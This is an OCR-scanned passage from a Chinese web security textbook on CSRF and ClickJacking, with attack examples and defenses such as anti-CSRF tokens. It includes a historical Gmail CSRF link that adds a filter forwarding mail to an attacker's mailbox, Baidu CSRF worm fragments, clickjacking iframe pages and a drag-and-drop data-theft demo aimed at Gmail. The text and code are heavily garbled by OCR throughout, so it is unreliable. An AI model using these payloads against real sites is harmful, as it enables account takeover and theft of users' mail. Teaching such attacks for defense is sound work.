<form action="/regist d="register" 
method="post" 
<input type=text nam rname" value / 
<input type=password name="password" 
value="" / 
input type=submit me="submit" 
alue="submit" /> 
/form> 


用 户 可 以 笑 试 构造 一 个 GET 请 求 : 
Pi UE i 
username-test&password-passwi 


来 提交 ， 帮 服务 需 端 未 对 请 求 方法 进行 限制 ， 则 这 个 请 求 会 通过 。 

如 果 服 务 器 端 已 经 区 分 了 GET 与 POST， 那 么 攻击 者 有 什么 方法 呢 ? 对 
于 攻击 者 来 说 ， 有 若干 种 方法 可 以 构造 出 一 个 POST 请 求 。 

最 简单 的 方法 ， 束 是 在 一 个 页 面 中 构造 好 一 个 form 表 单 ， 然 后 使 用 
JavaScript 目 动 提交 这 个 表单 。 比 如 ， 攻 击 者 在 www.b.comy/test.html 中 编 
写 如 下 代码 : 


form action="http://www.a.com/register" 
i " method="post" > 
n 


«fo 

id="register 

<input type-text name-"username" value="" /> 

«input type-password name-"password" 

value- me 2 

«input type=submit name="submit" 
ue= it" /> 


= document.getElementById("register"); 
.value = "test"; 


[0] 
s[1].value = "passwd"; 
O0; 


攻击 者 甚至 可 以 将 这 个 页 面 隐藏 在 一 个 不 可 见 的 这 ame 窒 口中 ， 那 么 整 
个 自动 提交 表单 的 过 程 ， 对 于 用 户 来 说 也 是 不 可 见 的 。 
ee CSRF 漏 洞 攻 击 过 程 中 ， 安 全 研究 者 pdp 展 示 了 这 一 技 
Ts 

首先 ， 用 户 需 要 登录 Gmail 账户 ， 以 便 让 浏览 器 获得 Gmail 的 临时 


Cookie。 


用 户 登 录 Gmail 
然后 ， 攻 击 者 诱 使 用 户 访问 一 个 恶意 页 面 。 


Mozilla Firefox "ua. 


Be (X ew crees Desewis js Heb 


MI Googe Mal - Inbox (157) 5 (Untitled) a - 


Pom None © E ome 9 


Ji cti E S FP T | Po RU TE 


TEXT RBH +, Baie I — iframe, iframe HiH HETS [8] pdp 5 HJ 
CSRE 构 je DUT e 


http://www. gnucitizen.org/util/csrf? 
_method=POST&_enctype=multipart/form- 
data&_action 
=https%3A//mail.google.com/mail/h/ 
ewt1jmuj4ddv/%3Fv 
%3Dprf&cf2_emc=true&cf2_email=evil 
inbox@mailinator .com&cfi_from&cfi_to&cf1_subj 
&cfi_has&cfi_hasnot&cfi_attach=true&tfi& 
s=z&irf=on&nvp_bu_cftb=Create%20Filter 


这 个 链接 的 实际 作用 就 是 把 参数 生成 一 个 POST 的 表单 ， 并 目 动 提交 。 
由 于 浏览 器 中 已 经 存在 Gmail 的 临时 Cookie， 所 以 用 户 在 iframe 中 对 
Gmail 发 起 的 这 次 请 求 会 成 功 邮箱 的 Filter 中 会 新 创建 一 条 规则 ， 将 
所 有 带 附 件 的 邮件 都 转发 到 攻击 者 的 邮箱 中 。 


Re basem te ma ete we 


core 


Evil Site adds a Backdoor 


恶意 站 点 通过 CSRF 在 用 户 的 Gmail 中 建立 一 条 规则 

Google 在 不 久 后 即 修 补 了 这 个 漏洞。 

4.2.4 Flash CSRF 

多 种 方式 能 够 发 起 网 络 请 求 ， 包 括 POST。 比 如 下 面 这 段 代 


了 re fla s. dnm i. se itus 
r url - new URLRe eque est( i //target/page"); 
Š es(); 


url.data = par 
A a 
op(); 


除了 URLRequest 外 ， 在 Flash 中 还 可 以 使 用 getURL ，loadVars 等 方式 发 
起 请 求 。 比如 : 


req ne uadit ty, 
re add Re equ Header 00", ty 
end(" nup; BA rget/page?vi-123&v2-456" 
"blank", TR 


在 下 6、IE 7 中 ，Flash 发 送 的 网 络 请 求 均 可 以 带 上 本 地 Cookie; 但 是 从 
IE 8 起 ，Flash 发 起 的 网 络 请 求 已 经 不 再 发 送 本 地 Cookie T ° 

4.2.5 CSRF Worm 

2008 年 9 月 ， 国 内 的 安全 组 织 80sec 公 布 了 一 个 百度 的 CSRF Worm 。 
漏洞 出 现在 百度 用 户 中 心 的 发 送 短 消息 功能 


daa Ke sg.baidu.com/? 
-Mailse nd&tn =bmSubmit&sn= 用 户 账户 &co 
ane 


只 需要 修改 参数 sn， 即 可 对 指定 的 用 户 发 送 短 消 息 。 而 百度 的 男 外 一 
个 接口 则 能 查询 出 某 个 用 户 的 所 有 好 友 


http://frd.baidu.com/?ct-28&un-/H P: I P: 
&cm-FriList&tn-bmABCFriList&callback-gotfriends 


将 两 者 结合 起 来 ， 可 以 组 成 一 个 CSRF Worm 让 一 个 百度 用 户 查 看 
恶意 页 面 后 ， 将 给 他 的 所 有 好 友 发 送 一 条 短 消 息 ， 然 后 这 条 短 消 息 中 
又 包含 一 张 图 片 ， 其 地 址 再 次 指向 CSRF 页 面 ， 使 得 这 些 好 友 再 次 将 消 
息 发 给 他 们 的 好 友 ， 这 个 Worm 因 此 得 以 传播 。 

Step 1: 模拟 服务 器 端 取得 request 的 参数 。 


定义 蠕虫 页 面 服务 器 地 址 ， 取 得 ?和 & 符 号 后 的 字符 串 ， 从 URL 中 提取 
感染 蠕虫 的 用 户 名 和 感染 者 的 好 友 用 户 名 。 
Step 2: 好 友 json 数 据 的 动态 获取 。 


var gotfriends = function (x) 


for(i-z0;i«friends.length;i-*)[( 


a a 然后 输 
Ae ° 

这 个 蠕虫 很 好 地 展示 了 CSRE 的 破坏 性 一 一 即使 没有 XSS 漏 洞 ， 仅 仅 依 
靠 CSRF， 也 是 能 够 发 起 大 规模 蠕虫 攻击 的 。 


43 ”CSRF 的 防御 

> eec 比较 奇特 的 攻击 ， 下 面 看 看 有 什么 方法 可 以 防御 这 种 
Jr-h o 

4.3.1 ”验证 码 

验证 码 被 认为 是 对 抗 CSRF 攻 击 最 简 涪 而 有 效 的 防御 方法 。 
CSRF 攻 击 的 过 程 ， 往 往 是 在 用 户 不 知情 的 情况 下 构造 了 网 络 请 求 。 而 
验证 码 ， 则 强制 用 户 必 须 与 应 用 进行 交互 ， 才 能 完成 最 终 请 求 。 因 此 
在 通常 情况 下 ， 验 证 码 能 够 很 好 地 遏制 CSRF 攻 击 。 

但 是 验证 码 并 非 万 能 。 很 多 时 候 ， 出 于 用 户 体 验 考 虑 ， 网 站 不 能 给 所 
有 的 操作 都 加 上 验证 码 。 因 此 ， 验 证 码 只 能 作为 防御 CSRF 的 一 种 辅助 
手段 ， 而 不 能 作为 最 主要 的 解决 方案 。 

4.3.2 Referer Check 

Referer Check f£ AEX Dal rp feas DL AY Iz FA Bot ee B3 IE A res BE” o 同 理 ， 
Referer Check 也 可 以 被 用 于 检查 请 求 是 否 来 目 合 法 的 “ 源 ”。 
常见 的 互联 网 应 用 ， 页 面 与 页 面 之 间 都 具有 一 定 的 逻辑 关系 ， 这 了 就 使 
得 每 个 正常 请 求 的 Referer 具 有 一 定 的 规律 。 

比如 一 个 “论坛 发 帖 * 的 操作 ， 在 正常 情况 下 需要 先 登 录 到 用 户 后 台 ， 
或 者 访问 有 发 帖 功能 的 页 面 。 在 提 区 “发 帖 ? 的 表单 时 ，Referer 的 值 必 然 
是 发 帖 表单 所 在 的 页 面 。 如 果 Referer 的 值 不 是 这 个 页 面 ， 甚 至 不 是 发 
帖 网 站 的 域 ， 则 极 有 可 能 是 CSRF 攻 击 。 

即使 我 们 能 够 通过 检查 Referer 是 否 合法 来 判断 用 户 是 否 被 CSRF 攻 击 ， 
也 仅仅 是 满足 了 防御 的 充分 条 件 。Referer Check 的 缺陷 在 于 ， 服 务 器 并 
非 什么 时 候 都 能 取 到 Referer。 很 多 用 户 出 于 隐私 保护 的 考虑 ， 限 制 了 
Referer 的 发 送 。 在 某 些 情况 下 ， 浏 顺民 也 不 会 发 送 Referer ， 比 如 从 
HTTPS 跳 转 到 HTTP， 出 于 安全 的 考虑 ， 浏 贤 器 也 不 会 发 送 Ref-erer ° 
在 Flash 的 一 些 有 版 本 中 ， 兽 经 可 以 发 送 目 定义 的 Referer 头 。 虽 然 Flash 在 
新 版 本 中 已 经 加 强 了 安全 限制 ， 不 再 允许 发 送 自 定义 的 Referer 头 ， 但 
是 难免 不 会 有 别 的 客户 端 揪 件 允许 这 种 操作 。 

出 于 以 上 种 种 原因 ， 我 们 还 是 无 法 依赖 于 Ref-erer Check 作 为 防御 CSRF 
的 主要 手段 。 但 是 通过 Referer Check 来 监控 CSRF 攻 击 的 发 生 ， 倒 是 一 
种 可 行 的 方法 。 

4.3.3 Anti CSRF Token 

现在 业界 针对 CSRF 的 防御 ， 一 致 的 做 法 是 使 用 一 个 Token。 在 介绍 此 
方法 前 ， 先 了 解 一 下 CSRF 的 本 质 。 


43.31 CSRF 的 本 质 

CSRF 为 什么 能 够 攻击 成 功 ? 其 本 质 原因 是 重要 操作 的 所 有 参数 都 是 可 
以 被 攻击 者 猜测 到 的 。 

攻击 者 只 有 预测 出 URL 的 所 有 参数 与 参数 值 ， 才 能 成 功 地 构造 一 个 伪 
造 的 请 求 ， 反之， 攻击 者 将 无 法 攻击 成 功 。 

出 于 这 个 原因 ， 可 以 想到 一 个 解决 方案 : 把 参数 加 密 ， 或 者 使 用 一 些 
随机 数 ， 从 而 让 攻击 者 无 法 猜测 到 参数 值 。 这 是 “不 可 预测 性 原则 ”的 
一 种 应 用 (参考 “我 的 安全 世界 观 ” 一 章 ) 。 

比如 ， 一 个 删除 操作 的 URL 是 : 

把 其 中 的 username 参 数 改 成 哈 希 值 : 


http://host/path/delete?username=md5(salt 
*abc)&item-123 


这 样 ， 在 攻击 者 不 知道 salt 的 情况 下 ， 是 无 法 构造 出 这 个 URL 的 ， 因 此 
也 就 无 从 发 起 CSRF 攻 击 了 。 而 对 于 服务 器 来 说 ， 则 可 以 从 Session 或 
Cookie 中 取得 “username=abc” 的 值 ， 再 结合 salt 对 整个 请 求 进行 验证 ， 
正常 请 求 会 被 认为 是 合法 的 。 

但 是 这 个 方法 也 存在 一 些 问题 。 首 先 ， 加 和 密 或 混 清 后 的 URL 将 变 得 非 
常 难 谈 ， 对 用 户 非 常 不 友好 。 其 次 ， 如 果 加 密 的 参数 每 次 都 改变 ， 则 
某 些 URL 将 无 法 再 被 用 户 收藏 >。 最后， 普通 的 参数 如 果 也 被 加 密 或 哈 
锅 ， 将 会 给 数据 分 析 工 作 融 来 很 大 的 困扰 ， 因 为 数据 分 析 工 作 常 常 需 
要 用 到 参数 的 明文 。 

因此 ， 我 们 需要 一 个 更 加 通用 的 解决 方案 来 帮助 解决 这 个 问题 。 这 个 
方案 就 是 使 用 Anti CSRFToken ° 

回 到 上 面 的 UREL 中 ， 保 持原 参数 不 变 ， 新 增 一 个 参数 Token。 这 个 
Token 的 值 是 随机 的 ， 不 可 预测 : 


http://host/path/delete? 
username-abc&item-123&token-[random(seed)] 


Token 需 要 足够 随机 ， 必 须 使 用 足够 安全 的 随机 数 生成 算法 ， 或 者 采用 
真 随机 数 生 成 器 (物理 随机 ， 请 参考 “加 密 算法 与 随机 数 ” 一 章 ) 。 
Token 应 该 作为 一 个 “秘密 ”， 为 用 户 与 服务 器 所 共同 持 有 ， 不 能 被 第 三 
o CE Token n] UDC EH PA BJSessionP, WEW gs 
JCookie"H ° 


rae ， 攻 击 痢 无 法 再 构造 出 一 个 完整 的 URL 实 施 CSRF 攻 


Token 需 要 同时 放 在 表单 和 Session 中 。 在 提交 请 求 时 ， 服 务 器 只 需 验证 
表单 中 的 Token， 与 用 户 Session 〈 或 Cookie) 中 的 Token 是 否 一 致 ， 如 
果 一 致 ， 则 认为 是 合法 请 求 ; 如 果 不 一 致 ， 或 者 有 一 个 为 空 ， 则 认为 
请 求 不 合法 ， 可 能 发 生 了 CSRF 攻 击 。 

如 下 这 个 表单 中 ，Token 作 为 一 个 隐藏 的 mp-put 字 段 ， 放 在 form 中 : 


【童话 玩具 了 娃娃 可 爱 六 件 套 装 时 尚 玩 偶 W-600 


全 选 | 删除 | 对 比 选中 的 宝贝 
de 
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p| mav CSS Hk DOK B Events (Cookies = — I Ec 


gj «div class-"PagingHav"? 

=) <form id=“itemsForm” target="_blank” namec"itemsForm" method="post”> 
<input type="hidden” value="51e43e031365b" name=” tb [ETT "> 

Œ <div class="batch-buy-fav-operate”> 

gj <script type="text/javascript” language="javascript”> 

F <script srcz"http: //a. tbedn. cn/app/favorite/assets/js/app/recommend list 
fyui-taobao. js?t=20080805" type=“text/javascript”> 

<script src=“http://a. tbcdn. cn/app/favorite/assets/js/app/recommend list 
frecommend_list. js?t=20080805" typez"tezt/javascript"? 

<script trpez"tezt/ javascript"? 

Œ «div id=“FavoritesList” class=“MyFavor my-shop-fav"? 

F «div class="batch-buy-fav-operate”> 

£f form? 


隐藏 字段 中 的 Token 
同时 Cookie 中 也 包含 了 一 个 Token: 


Lu ! myx css Pk nor Mv Events Cookies 


Connection keep-alive 

Cookie wi$e16c1042cf0143c140924ed4 1314406, ODISE «9544 b f895T LATS: 
N2Cfe2be80a2b309Tab058ed4 fe60446bOe2 045182C 30412631 12492b35; 
;otz0e958bTea$d3fTdf4Tcfa6fddd$c6óeJe; cma-EXuTAT27135DAeEdA 
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Cookie 中 的 Token 


4.3.3.2 ”Token 的 使 用 原则 

Anti CSRF Token 在 使 用 时 ， 有 若干 注意 事项 。 

防御 CSRF 的 Token， 是 根据 “不 可 预测 性 原则 ”设计 的 方案 ， 所 以 Token 
的 生成 一 定 要 足够 随机 ， 需 要 使 用 安全 的 随机 数 生 成 恬 生 成 Token。 
此 外 ， 这 个 Token 的 目的 不 是 为 了 防止 重复 提交 。 所 以 为 了 使 用 方便 ， 
可 以 允许 在 一 个 用 户 的 有 歼 生 命 周 期 内 ， 在 Token 消 耗 掉 前 都 使 用 同一 
个 Token。 但 是 如 果 用 户 已 经 提交 了 表单 ， 则 这 个 To-ken 已 经 消耗 挥 ， 
应 该 再 次 重新 生成 一 个 新 的 To-ken ° 

如 果 Token 保 存在 Cookie 中 ， 而 不 是 服务 器 问 的 Session 中 ， 则 会 带 来 一 
个 新 的 问题 。 如 果 一 个 用 户 打 开 几 个 相同 的 页 面 同 时 操作 ， 当 某 个 页 
面 消 耗 掉 Token 后 ， 其 他 页 面 的 表单 内 保存 的 还 是 被 消耗 抒 的 那个 
Token， 因 此 其 他 页 面 的 表单 再 次 提交 时 ， 会 出 现 Token 错 误 。 在 这 种 
情况 下 ， 可 以 考虑 生成 多 个 有 效 的 Token， 以 解决 多 页 面 共存 的 场景 。 
最 后 ， 使 用 Token 时 应 该 注意 Token 的 保密 性 。Token 如 果 出 现在 某 个 页 
面 的 URL 中 ， 则 可 能 会 通过 Referer 的 方式 泄露 。 比 如 以 下 页 面 : 


http://host/path/manage? 
username=abc&token=[random] 


这 个 manage 页 面 是 一 个 用 户 面 板 ， 用 户 需要 在 这 个 页 面 提交 表单 或 者 
单 击 “删除 "按钮 ， 才 能 完成 删除 操作 。 

在 这 种 场景 下 ， 如 果 这 个 页 面包 含 了 一 张 攻 击 者 能 指定 地 址 的 图 片 : 

Wi] *http://host/path/manage?user-name-abc&token-[random]" 2: 1E 7j HTTP 
THSKBJRefererz x&$levil.comB3Hk25 38... Mi Se Tokeni S& ° 

此 在 使 用 Token 时 ， 应 该 尽量 把 Token 放 在 表单 中 。 把 敏感 操作 由 
GET 改 为 POST， 以 form 表 单 (或 者 AJAX) 的 形式 提交 ， 可 以 避免 


re 


Token? f% ° 

此 外 ， 还 有 一 些 其 他 的 途径 可 能 导致 Token 汇 露 。 比 如 XSS 漏 洞 或 者 一 
些 跨 域 漏洞 ， 都 可 能 让 攻击 者 窃取 到 Token 的 值 。 

CSREF 的 Token 仅 仅 用 于 对 抗 CSRF 攻 击 ， 当 网 站 还 同时 存在 XSS 漏 润 
时 ， 这 个 方案 就 会 变 得 无 效 ， 因 为 XSS 可 以 模拟 客户 端 浏览 器 执行 任意 
操作 。 在 XSS 攻 击 下 ， 攻 击 者 完全 可 以 请 求 页 面 后 ， 读 出 页 面 内 容 里 的 
Token 值 ， 然 后 再 构造 出 一 个 合法 的 请 求 。 这 个 过 程 可 以 称 之 为 
XSRF， 和 CSRF 以 示 区 分 。 

XSsSs 带 来 的 问题 ， 应 该 使 用 XSS 的 防御 方案 予以 解决 ， 否 则 CSRF 的 
Token 防 御 就 是 空中 楼 阁 。 安 全 防御 的 体系 是 相辅相成 、 缺 一 不 可 的 。 


44 小 结 

本 章 介 绍 了 Web 安 全 中 的 一 个 重要 威胁 : CSRF 攻 击 。CSRF 攻 击 也 能 
够 造成 严重 的 后 果 ， 不 能 忽略 或 轻视 这 种 攻击 方式 。 
CSRF 攻 击 是 攻击 者 利用 用 户 的 身份 操作 用 户 账户 的 一 种 攻击 方式 。 设 
计 CSRF 的 防御 方案 必须 先 理解 CSRF 攻 击 的 原理 和 本 质 。 

根据 “不 可 预测 性 原则 *， 我 们 通常 使 用 AntiCSRF Token 来 防御 CSRF 攻 
击 。 在 使 用 Token 时 ， 要 注意 Token 的 保密 性 和 随机 性 。 


第 5 章 Ris (ClickJacking) 


2008 年 ， 安 全 专家 Robert Hansen 5 Jeremiah Grossman 发 现 了 一 种 被 他 
们 称 为 “ClickJacking”(〈 点 击 劫持 ) 的 攻击 ， 这 种 攻击 方式 影响 了 几乎 
所 有 的 桌面 平台 ， 包 括 IE、Safari、Firefox、Opera 以 及 Adobe Flash ° 
两 位 发 现 者 准备 在 当年 的 OWASP 安 全 大 会 上 公布 并 进行 演示 ， 但 包括 
Adobe 在 内 的 所 有 厂 商 ， 都 要 求 在 漏洞 修补 前 不 要 公开 此 问题 。 


5. 1 什么 是 点 击 劫持 

点 击 支持 是 一 种 视觉 上 的 欺 统 手段 。 攻 击 者 使 用 一 个 透明 的 、 不 可 见 
的 iframe， 黎 次 在 一 个 网 页 上 ， 然 后 户 使 用 户 在 该 网 页 上 进行 操作 ， 
此 时 用 户 将 在 不 知情 的 情况 下 点 击 透 明 的 这 ame 页 面 。 通 过 调整 iframe 
页 面 的 位 置 ， 可 以 诱 使 用 户 恰 好 点 击 在 iframe 页 面 的 一 些 功能 性 按钮 


witten 
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看 下 面 这 个 例子 。 


在 http:/www.a.comytesthtm] 页 面 中 插入 了 一 个 指向 目标 网 站 的 iframe， 
出 于 演示 的 目的 ， 我 们 让 这 个 iframe 变 成 半 透 明 : 


<!DOCTYPE html» 
«html» 
«head» 
<title>CLICK JACK!!!«/title» 
«style» 
iframe { 
width: 900px; 
height: 250px; 
/* Use absolute positioning to 
line up update button with fake button */ 
position: absolute; 
top: -195px; 


/* Hide from view */ 
-moz-opacity: 0.5; 
Opacity: 0. 
filter: alphatopacityz 0.5); 


} 

button { 

position: absolute; 
top: 10px 

left: 10px; 
z-index: 1; 

width: 120px; 


</style> 
</head> 
<body> 
<iframe src="http://www.qidian.com" 
scrolling="no"></iframe> 
<button>CLICK HERE! </button> 
</body> 
</html> 


在 这 个 testhtml 中 有 一 个 button， 如 果 iframe 完 全 透明 时 ， 那 么 用 户 看 

到 的 是 : 

. CLICK HERE! | 

用 户 看 到 的 按钮 

当 iframe 半 透明 时 ， 可 以 看 到 ， 在 button 上面 其 实 履 盖 了 另 一 个 网 页 : 
“Lite siege RE 

实际 的 页 面 ， 按 钮 上 隐藏 了 一 个 iframe 窗 口 

禾 盖 的 网 页 其 实 是 一 个 搜索 按钮 : 


ae 

e unl, TETE d- 

隐 着 的 iframe 窗 口 的 内 容 

当 用 户 试图 点 击 test.html 里 的 button 时 ， 实 际 上 却 会 点 击 到 iframe 页 面 
中 的 搜索 按钮 。 


分 析 其 代码 ， 起 到 关键 作用 的 是 下 面 这 儿 行 : 


opacity: 0.5; 
filter: alpha(opacity=0.5); 


通过 控制 ifame 的 长 、 宽 ， 以 及 调整 ttp、left 的 位 置 ， 可 以 把 iframe 页 
面 内 的 任意 部 分 覆盖 到 任何 地 方 。 同 时 设置 ifame HJ position 为 
absolute， 并 将 z-index 的 值 设 置 为 最 大 ， 以 达到 让 iframe 处 于 页 面 的 最 
上 层 。 最 后 ， 再 通过 设置 opacity 来 控制 iframe 页 面 的 透明 程度 ， 值 为 0 
是 完全 不 可 见 。 

这 样 ， 束 完成 了 一 次 点 击 支持 的 攻击 。 

点 击 劫持 攻击 与 CSREF 攻 击 〈 详 见 “ 跨 站 点 请 求 伪 造 ” 一 章 ) 有 异曲同工 
之 妙 ， 都 是 在 用 户 不 知情 的 情况 下 户 使 用 户 完 成 一 些 动 作 。 但 是 在 
CSRF 攻 击 的 过 程 中 ， 如 果 出 现 用 户 交 互 的 页 面 ， 则 攻击 可 能 会 无 法 顺 
利 完 成 。 与 之 相反 的 是 ， 点 击 劫持 没有 这 个 顾虑 ， 它 利用 的 就 是 与 用 
户 产 生 交 互 的 页 面 。 

twitter 也 曾经 遭受 过 “点 击 壳 持 攻 击 *。 安全 人 研究 者 演示 了 一 个 在 别人 不 
知情 的 情况 下 发 送 一 条 twitter 消 息 的 POC， 其 代码 与 上 例 中 类 似 ， 但 
是 POC 中 的 iframe 地 址 指向 了 : 


«iframe scrolling-' 

src="http://twitter. "con/hone?status= Yes, I 
did click the button! 

(WHAT! !??) "></iframe> 


在 twitter 的 UREL 里 通过 status 参 数 来 控制 要 发 送 的 内 容 。 攻 击 者 调整 页 
面 ， 使 得 Tweet 按 钮 被 点 击 支 持 。 当 用 户 在 测试 页 面 点击 一 个 可 见 的 
button 时 ， 实 际 上 却 在 不 经 意 间 发 送 了 一 条 微 博 。 


5.2 Flash 点 击 劫持 

下 面 来 看 一 个 更 为 严重 的 ClickJacking 攻 击 案例 。 攻 击 者 通过 Flash 构 造 
出 了 点 击 劫持， 在 完成 一 系列 复杂 的 动作 后 ， 最 终 控制 了 用 户 电 脑 的 
摄像 头 。 

目前 Adobe 公 司 已 经 在 Flash 中 修补 了 此 漏洞 。 攻 击 过 程 如 下 : 

首先 ， 攻 击 者 制作 了 一 个 Flash 游 戏 ， 并 诱 使 用 户 来 玩 这 个 游戏 。 这 个 
ee 每 次 点 击 后 这 个 按钮 的 位 置 都 


演示 点 击 劫持 的 Flash 游 戏 
在 其 上 隐藏 了 一 个 看 不 见 的 iame: 


Scow 6 Teme 100 Some of the 
jame ch 


Flash 上 隐藏 的 iframe 窗 口 
游戏 中 的 茶 些 点 击 是 有 意义 的 ， 某 些 点 击 是 无 效 的 。 攻 击 通过 诱导 用 
户 鼠 标点 击 的 位 置 ， 能 够 完成 一 些 较为 复杂 的 流程 。 


某 些 点 击 是 无 意义 的 


某 些 点 击 是 无 意义 的 
最 终 通 过 这 一 步 步 的 操作 ， 打 开 了 用 户 的 摄像 头 。 


Th hes un nomena 
os une rmn y 


webcam. The reat af 


通过 点 击 动 持 打开 了 摄像 头 


53 图片 覆盖 攻击 

点 击 动 持 的 本 质 古 一 种 视觉 欺 弦 。 顺 着 这 个 思路 ， 还 有 一 些 攻击 方法 
也 可 以 起 到 类 似 的 作用 ， 比 如 图 片 覆 盖 。 

一 名 叫 sven.vetsch 的 安全 人 研究 者 最 先 S 了 这 种 Cross Site Image 
Overlaying 攻 击 ， 人 简称 XSIO。sven.vetsch 通 过 调整 图 片 的 style 使 得 图 片 
He sce 他 所 指 定 的 任意 位 置 。 


a hr T "http://disenchant.ch"» 

img i //di enant ch/pow d.jpg 
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覆盖 后 的 页 面 变 成 


覆盖 后 的 页 面 

页 面 里 的 logo 图 片 被 覆盖 了 ， 并 指 回 了 sven.vetsch 的 网 站 。 如 果 用 户 此 
时 再 去 点 击 logo 图 片 ， 则 会 被 链接 到 sven.vetsch 的 网 站 。 如 果 这 是 一 
钓鱼 网 站 的 话 ， 用 户 很 可 能 会 上 当 。 

XSIO 不 同 于 XSS， 它 利用 的 是 图 片 的 style， 或 者 能 够 控制 CSS。 如 果 
应 用 没有 限制 style 的 po-sition 为 absolute 的 话 ， 图 片 就 可 以 履 盖 到 页 面 
上 的 任意 位 置 ， 形 成 点 击 劫持 。 

百度 至 亲 也 曾经 呈现 过 这 个 门 题 ， 芍 千代 拘 如 下 


Srta ble><a href= hae dre npa ntOm.org"> 
c= "ht p: //im m/hi/im mg/ 
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扩 击 此 图 片 的 话 ， 会 被 链接 到 其 他 网 站 。 

图 片 还 可 以 伪装 得 像 一 个 正和 常 的 链接 、 按 钮 ， 或 者 在 图 片 中 构造 一 些 
文字 ， 履 兰 在 关键 的 位 置 ， 残 有 可 能 完全 改变 页 面 中 想 表达 的 意思 ， 
在 这 种 情况 下 ， 不 需要 用 户 点 击 ， 也 能 达到 欺 驴 的 目的 。 

比如 ， 利 用 XSIO 修 改 页 面 中 的 联系 电话 ， 可 能 会 导致 很 多 用 户 上 当 。 
由 于 <img> 标 签 在 很 多 系统 中 是 对 用 户 开 放 的 ， 因 此 在 现实 中 有 非常 
多 的 站 点 存在 被 XSIO 攻 击 的 可 能 。 在 防御 XSIO 时 ， 和 需要 检查 用 户 提 
交 的 HTML 代 码 中 ，<img> 标 签 的 style 属 性 是 否 可 能 导致 浮 出 。 


5.4 Peace 

2010 年 ，ClickJacking 技 术 有 了 新 的 发 展 。 一 位 名 叫 Paul Stone] Zz 4 jf 

R t TE BlackHat 2010 大 会 上 发 表 了 题 为 *Next Generation Clickjack- 

。 在 该 演讲 中 ， 提 出 了 “浏览 器 拖 搜 事件 ”导致 的 一 些 安全 问 

题 o 

目前 很 多 浏览 器 都 开始 支持 Drag & Drop 的 API。 对 于 用 户 来 说 ， 拖 搜 

使 他 们 的 操作 更 加 简单。 浏览 器 中 的 拖 搜 对 象 可 以 是 一 个 链 授 ， 也 可 

以 是 一 段 文字 ， 还 可 以 从 一 个 窗口 拖 搜 到 另外 一 个 窗口 ， 因 此 拖 搜 是 

不 受 同 源 入 略 限制 的 。“ 拖 搜 动 持 ” 的 思路 是 诱 使 用 户 从 隐藏 的 不 可 见 

iframe 中 “ 拖 搜 ”出 攻击 者 希望 得 到 的 数据 ， 然 后 放 到 攻击 者 能 控制 的 田 

外 一 个 页 面 中 ， 从 而 窃取 数据 。 

在 JavaScript 或 者 Java API 的 文 持 下 ， 这 个 攻击 过 程 会 变 得 非常 隐蔽 。 

为 它 突破 了 传统 Click-Jacking 一 些 先天 的 局 限 ， 所 以 这 种 新 型 的 “ 拖 搜 

支持 ?能够 造成 更 大 的 破坏 。 

内 的 安全 人 研究 者 xisigr 曾 经 构造 了 一 个 针对 Gmail 的 POC， 其 过 程 大 色 
Whe 


百 完 ， 制 作 一 个 网 页 小 游戏 ， 要 把 小 球 拖 搜 到 小 海狗 的 头顶 上 。 


4 A 

演示 拖 搜 动 持 的 网 页 小 游戏 

SEP E. ENERALE SE TR ERU Boat Jiframe 。 

在 这 个 例子 中 ，xisigr 使 用 event.dataTrans-fer.getData( Text") X 7X 
取 “drag” 到 的 数据 。 当 用 户 拖 搜 小 球 时 ， 实 际 上 是 选中 了 隐藏 的 ifame 


里 的 数据 ; 在 放下 小 球 时 ， 把 数据 也 放 在 了 隐藏 的 textarea 中 ， 从 而 完 
成 一 次 数据 镭 取 的 过 程 。 


隐藏 的 iframe 


区 的 gmai| 内 容 区 Show the jacked I--Frame | Ul Show the jacked Textarea | 


Design by xisigr 


. ERMS.. $1-025X 0 页 VIA RAR 已 发 邮件 所 有 邮件 垃圾 邮件 (4) 已 删除 邮件 (T) Oday code PAREN Information ， 
WENNS ` 他 操作 FEARR 标记 为 已 刷新 启动 完整 版 6mail RE: 全 部 、 无 、 已 读 、 未 读 、 已 加 星 标 、 未 加 星 标 第 1 - 0 页 ， 共 0 页 FBR 
H i YER UN ve KEMERE ERAEN VERET ji Ais 标记 为 已 读 1 


si 
mi 
2 
cu 
sek 
4m 
Skt 
i SS 
-F 
E: 
nk 
a 
n 
3$ 


原理 示意 图 


这 个 例子 的 源 代码 如 下 : 


<html> 
<head> 
<title> 
Gmail Clickjacking with drag and drop 
Attack Demo 
</title> 
<style> 
.iframe_hidden{height: 50px; width: 
50px; top:360px; left:365px; overflow:hidden; 
filter: alpha(opacity=0); opacity:.0; 
position: absolute; } .text area hidden( 
height: 30px; width: 30px; top:160px; 
left:670px; overflow:hidden; filter: 
alpha(opacity=0); opacity: .0; 
position: absolute; } .ball{ top:350px; 
left:350px; 
position: 
absolute; } .ball 1{ top:136px; left:640px; 
filter: alpha(opacity=0); 
opacity:.0; position: 
absolute; }.Dolphin{ top:150px; left:600px; 
position: 
absolute; }.center{ margin-right: 
auto;margin-left: auto; 
vertical-align:middle;text-align:center; 
margin-top:350px;j 
</style> 
<script> 
function Init() { 
var source = 


document.getElementById("source"); 
var target - 
document .getElementById("target"); 
if (source.addEventListener) { 
target.addEventListener("drop", 
DumpInfo, false); 
) else { 
target.attachEvent("ondrop", 
DumpInfo); 


} 
function DumpInfo(event) { 
showHide ball.call(this); 
showHide ball 1.call(this); 
var info - 
document.getElementById("info"); 
info.innerHTML += "<span 
style='color:#3355cc; font-size:13px'>"_ + 
event.dataTransfer.getData('Text') + "</ 
span><br> "; 
} 
function showHide frame() { 
var iframe 1 - 
document.getElementById("iframe 1"); 
iframe 1.style.opacity = 
this.checked ? "0.5": "Q"; 
iframe 1.style.filter = 
"progid:DXImageTransform.Microsoft.Alpha(opac 


ity-" + 
(this.checked ? "50": "Q") + ");" 
l 


function showHide text() { 
var text 1 - 
document.getElementById("target"); 
text 1.style.opacity - 
this.checked ? "0.5": "Q"; 
text 1.style.filter = 
"progid:DXImageTransform.Microsoft.Alpha(opac 


ity-" + 
(this.checked ? "50": "Q") + ");" 
l 


function showHide ball() { 
var hide ball - 
document.getElementById("hide ball"); 
hide ball.style.opacity - "0"; 
hide ball.style.filter - 
"alpha(opacity=0)"; 
J 


function showHide_ball_1() { 
var hide_ball_1 = 
document.getElementById("hide ball 1"); 
hide ball 1.style.opacity = "1"; 
hide ball 1.style.filter - 
"alpha(opacity-100)"; 
} 


function reload_text() { 


document .getElementById("target").value = ''; 


</script> 
</head> 
<body onload="Init();"> 
<center> 
«hi» 
Gmail Clickjacking with drag and 
drop Attack 
«/hi» 
</center> 
